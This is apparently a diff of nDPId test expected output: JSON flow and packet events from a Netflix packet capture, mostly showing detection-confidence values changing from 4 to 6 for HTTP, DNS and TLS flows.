+01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1917,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064590,"flow_last_seen":1484319064634,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":505,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1484319064634,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.3.140","url":"23.246.3.140\/?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1921,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064669,"flow_last_seen":1484319064669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064669,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1921,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1484319064669,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064669,"pkt":"gCqoTGHM5JjWH70UCABFAABAhwJAAEAGqhTAqAEHNr8RM8\/JAbsptVYdAAAAALAC\/\/+MwgAAAgQFtAEDAwUBAQgKH2Uv3QAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1922,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064671,"flow_last_seen":1484319064671,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064671,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1922,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1484319064671,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064671,"pkt":"gCqoTGHM5JjWH70UCABFAABAbOBAAEAGxDbAqAEHNr8RM8\/SAbtTxg2UAAAAALAC\/\/+rMAAAAgQFtAEDAwUBAQgKH2Uv3gAAAAAEAgAA"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1925,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064683,"flow_last_seen":1484319064683,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1484319064683,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1925,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1484319064683,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1484319064683,"pkt":"gCqoTGHM5JjWH70UCABFAABFcJ0AAP8Rx7HAqAEHwKgBAe4iADUAMSObED0BAAABAAAAAAAAB2ljaG5hZWEDZ2VvB25ldGZsaXgDY29tAAABAAE="} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1925,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064683,"flow_last_seen":1484319064683,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1484319064683,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.geo.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1925,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064683,"flow_last_seen":1484319064683,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1484319064683,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.geo.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1930,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1484319064699,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1484319064699,"pkt":"5JjWH70UgCqoTGHMCABFAADq4UlAAEAR1WDAqAEBwKgBBwA17iIA1plWED2BgAABAAkAAAAAB2ljaG5hZWEDZ2VvB25ldGZsaXgDY29tAAABAAHADAAFAAEAAAAMABkHaWNobmFlYQdsYXRlbmN5BnByb2RhYcAYwDUAAQABAAAAFgAENCUk\/MA1AAEAAQAAABYABDQrZhTANQABAAEAAAAWAAQ0Iv+pwDUAAQABAAAAFgAENBhu0sA1AAEAAQAAABYABDQK7rvANQABAAEAAAAWAAQ2RB9SwDUAAQABAAAAFgAENCdXJMA1AAEAAQAAABYABDQobnM="} -00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1930,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319064683,"flow_last_seen":1484319064699,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1484319064699,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.geo.netflix.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.37.36.252"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1930,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319064683,"flow_last_seen":1484319064699,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1484319064699,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.geo.netflix.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.37.36.252"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1935,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064711,"flow_last_seen":1484319064711,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064711,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1935,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1484319064711,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064711,"pkt":"gCqoTGHM5JjWH70UCABFAABAfOpAAEAGov3AqAEHNCUk\/M\/TAbvE99WSAAAAALAC\/\/9grAAAAgQFtAEDAwUBAQgKH2UwAgAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1937,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1484319064722,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064722,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGRvs2vxEzwKgBBwG7z9JcNkhzU8YNlaASOJDYrwAAAgQFtAQCCAqtilitH2Uv3gEDAwg="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1938,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1484319064722,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064722,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGR\/s2vxEzwKgBBwG7z8mqa43KKbVWHqASOJAmtQAAAgQFtAQCCAqtilitH2Uv3QEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1484319064723,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064723,"pkt":"gCqoTGHM5JjWH70UCABFAAA06mxAAEAGRrbAqAEHNr8RM8\/SAbtTxg2VXDZIdIAQEBUvyAAAAQEICh9lMA6tilit"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1484319064724,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064724,"pkt":"gCqoTGHM5JjWH70UCABFAAA0RtdAAEAG6kvAqAEHNr8RM8\/JAbsptVYeqmuNy4AQEBV9zAAAAQEICh9lMA6tilit"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1942,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064669,"flow_last_seen":1484319064728,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319064728,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1943,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064671,"flow_last_seen":1484319064729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319064729,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1942,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064669,"flow_last_seen":1484319064728,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319064728,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1943,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064671,"flow_last_seen":1484319064729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319064729,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1950,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1484319064781,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064781,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGNcw0JST8wKgBBwG7z9NfgzodxPfVk6ASRersYQAAAgQFtAQCCAqFpSALH2UwAgEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1953,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1484319064782,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064782,"pkt":"gCqoTGHM5JjWH70UCABFAAA0MmJAAEAG7ZHAqAEHNCUk\/M\/TAbvE99WTX4M6HoAQEBVQwAAAAQEICh9lMEaFpSAL"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1957,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064711,"flow_last_seen":1484319064785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319064785,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1961,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064669,"flow_last_seen":1484319064796,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319064796,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064671,"flow_last_seen":1484319064823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319064823,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1964,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064669,"flow_last_seen":1484319064850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319064850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064711,"flow_last_seen":1484319064885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319064885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064671,"flow_last_seen":1484319064898,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319064898,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} -01370{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1977,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064711,"flow_last_seen":1484319064950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319064950,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1957,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064711,"flow_last_seen":1484319064785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319064785,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1961,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064669,"flow_last_seen":1484319064796,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319064796,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 